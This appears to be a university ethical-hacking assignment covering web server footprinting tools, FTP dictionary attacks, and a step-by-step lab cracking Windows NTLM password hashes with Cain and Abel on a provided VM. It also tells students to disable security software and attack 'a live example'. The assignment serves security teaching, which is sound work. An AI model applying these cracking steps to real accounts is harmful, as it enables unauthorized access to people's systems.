In-Class Assignment 2

5Marks

A: Footprint the Web Server

Scenario 3Marks

The first step of hacking web servers for a professional ethical hacker or pen tester is to
collect as much information as possible about the target web server and analyze the
collected information in order to find lapses in its current security mechanisms. The
main purpose is to learn about the web server’s remote access capabilities, its ports
and services, and other aspects of its security.

The information obtained in this step helps in assessing the security posture of the web
server. Footprinting may involve searching the Internet, newsgroups, bulletin boards,
etc. for gathering information about the target organization’s web server. There are also
tools such as [Link] and Whois Lookup that extract information such as the target’s
domain name, IP address, and autonomous system number.

Web server fingerprinting is an essential task for any penetration tester. Before
proceeding to hack or exploit a webserver, the penetration tester must know the type
and version of the webserver as most of the attacks and exploits are specific to the type
and version of the server being used by the target. These methods help any penetration
tester to gain information and analyze their target so that they can perform a thorough
test and can deploy appropriate methods to mitigate such attacks on the server.

An ethical hacker or penetration tester must perform footprinting to detect the

loopholes in the web server of the target organization. This will help in predicting the
effectiveness of additional security measures for strengthening and protecting the web
server of the target organization.

This exercise demonstrates how to footprint a web server using various footprinting
tools and techniques.

Assignment

 Highlight methods of Information gathering using Ghost Eye

 Explain web server reconnaissance using Skipfish
 Mention three tools to Footprint a web server
 Highlight how to perform enumeration on web server information using Nmap
Choose 1 live example and go step by step with the environment to conduct the
analysis.
(Screenshots)
B: Perform a Web Server Attack

Scenario

After gathering the required information about the target web server, the next task for
an ethical hacker or pentester is to attack the web server in order to test the target
network’s web server security infrastructure. This requires knowledge of how to perform
web server attacks.

Attackers perform webserver attacks with certain goals in mind. These goals may be
technical or non-technical. For example, attackers may breach the security of the
webserver to steal sensitive information for financial gain, or merely for curiosity’s sake.
The attacker tries all possible techniques to extract the necessary passwords, including
password guessing, dictionary attacks, brute force attacks, hybrid attacks, pre-
computed hashes, rule-based attacks, distributed network attacks, and rainbow attacks.
The attacker needs patience, as some of these techniques are tedious and time-
consuming. The attacker can also use automated tools such as Brutus and THC-Hydra,
to crack web passwords.

An ethical hacker or pentester must test the company’s web server against various
attacks and other vulnerabilities. It is important to find various ways to extend the
security test by analyzing web servers and employing multiple testing techniques. This
will help to predict the effectiveness of additional security measures for strengthening
and protecting the web servers of the organization.

Assignment 2
marks

 Explain how to crack FTP credentials using a Dictionary Attack

Choose 1 live example and go step by step with the environment to conduct the
analysis.
 C: Password cracking (10 marks)
Note:

 This lab deliberately does not give you all the information you need to complete it.
 You are expected to do the appropriate research and reading to get the information you need to
complete the lab.

Objective:
1. Creating accounts to be cracked
2. Cracking passwords by Brute Force
3. Cracking passwords by Dictionary

The Lab Activities

Part 1: Am I Cracked?

Take a screenshot.

Before looking at cracking passwords you may be wondering if anyone has possibly cracked your
passwords, or at least, got a hold of your personal data in some fashion. Another way to ask that
question is to ask yourself: “Have I been pwned?”

If you do not know what ‘pwn’ means, have a look at the definition: [Link]

If you really want to know, one way to check this is to go to the following website… you may be
surprised:

[Link]

Part 2: Creating User Accounts

Download the Windows VM from here. XP_Windows_SA.ova

Before we can look at cracking passwords, first we need to create some user accounts. On your
Windows VM create the following accounts with the associated passwords:

Account Password
user1 lmn*
 user2 wsxe42
user3 password
user4 rain

Part 3: Cracking Passwords – Local Microsoft System Passwords

In this part of the lab you will be using Cain and Abel to crack passwords. Cain and Abel can do a lot
more than just crack passwords, though for lab that is all we are going to use it for.

Note: Before you start this part of the assignment there are a number of things you need to ensure:

 You are logged into the Administrator account. This just makes the lab a little simpler to do.
 Find Cain and Abel and install it. [Link]
 That security is disabled for the duration of this activity. Turn off the firewall to download and
install the file (otherwise, virus scanner will prevent it from installing).
 At the end of installation, it might say that it uses Winpcap v4.1.3 and ask if you want to install
it. If installation failed on your computer (error message saying that it isn’t supported by your
version of Windows), Cane will be installed but will not run without this. You can go to
[Link] and install Winpcap v4.1.3. Launching Cane after this should work with no
addition installation required for it.
 That ‘Abel’ has been installed into the correct directory (check the manual to find the correct
directory). [Link]
 That the Abel service is ‘started’.
Note:

In Cain, there is a drop-down list with predefined character sets. In real scenario, you as an attacker
don't know what the password and you need to go with the more expanded character sets and yes it
takes time. In our cases, it takes even longer since we don't have a good processor speeds for such
activity and virtual machines make it even slower. Thus, in this assignment since you already know
what the password is, you can make a shortcut and set the character sets accordingly.

Set Up Steps

1. Start Cain and click the Network tab.

2. In the left pane, right-click Quick List and select “Add to Quick List”.
3. Enter your computer name or Windows IP Address in the text box and click OK.
4. Expand the Quick List and double click on your IP address.
5. Expand Abel and select Hashes. A Cain box pops up asking "Include password history hashes?".
Click ‘No’. The password hashes should appear.

NB: there are two Hash values: LM Hashes are for backward compatibility with Win9x systems
and NT Hashes are for NT\2000\XP\Windows 7 systems.

6. Right-click in the right pane and click "Send All to Cracker".

Brute Force Cracking Steps

1. Click the Cracker tab. In the right pane, right-click user1, select "Brute-Force Attack", and click
"NTLM Hashes".
2. In the "Brute-Force Attack" box, click the Start button. It should find the four-character password
in a few seconds. Take a screenshot that included the Brute-Force Attack box open with the
cracked passed and save it.
3. Close the "Brute-Force Attack" box.
4. Brute-force attack user2. You’ll find the six-letter password is harder to crack. It will take
approximately 10 minutes to crack, depending on the speed of your processor.
5. Take a screenshot that included the Brute-Force Attack box open with the cracked passed and
save it.
Dictionary Cracking Steps:

While still using Cain…

1. In the right pane, right-click user3, point to "Dictionary Attack", and click "NTLM Hashes". Cain
should FAIL to crack the hash.
Close the “Dictionary Attack” window.

2. A dictionary attack is really a word list attack where every word in the dictionary (wordlist) is
checked. Dictionary attacks are more efficient than Brute Force but may not be successful if the
dictionary doesn’t contain the word.
To increase the probability of cracking the password there are two approaches – use a more
comprehensive list or include string manipulation to increase the chance of matching the
password, e.g. reversing the password, or adding numbers to the beginning or end, etc..

3. Right-click on user3 again and select “Dictionary Attack” and click “NTLM Hashes.
At the top of the “Dictionary Attack” box, right click the file box and select Add to list. Browse to
the location of the dictionary installed by Cain & Abel. When the file is added, click the Start
button. This time Cain should SUCCEED in cracking the hash. Take a screenshot that included the
Dictionary Attack box open with the cracked passed and save it.

Right-click in the file area and select “Remove All” and confirm by saying “Yes”.

Close the Dictionary Attack window

4. Download the document 1k_most_common.txt from the Assignment folder and save the file.
Move it in the Cain Wordlists directory. (Probably C:\Program Files (x86)\Cain\Wordlists)
5. Perform a dictionary attack on user4 using the 1k_most_common.txt dictionary. When the file is
loaded, click Start. Cain should FAIL to crack the hash. Close the “Dictionary Attack” window.
6. Navigate to the file 1k_most_common.txt and open it in Notepad.
7. Scroll down and scan the list of words commonly used for passwords. Notice that the word
“password” is in the list, but the word “rain” is not.
8. Edit the 1k_most_common.txt file and add the word “rain”.
Open the File menu and click on the Save item.

Repeat the dictionary attack on user4 and this time Cain should SUCCEED in cracking the hash. Take a
screenshot that included the Dictionary Attack box open with the cracked passed and save it.

Once all the passwords are cracked, insert the four (4) saved images of cracked passwords into your
report under the heading of “Cracked Passwords”.

Deliverable

Submit all the screenshots in one report and submit it in Moodle.

Deliverable:

 Your lab report should contain students names and number (or a cover page).
 For each part of the lab use a heading such as “Part 1” or “In class activity 2- Creating User
Accounts”.
 In all screenshots a part of the custom background (wallpaper) should be visible, time and date.
 Be consistent in using font type and size and do not use size bigger than 12.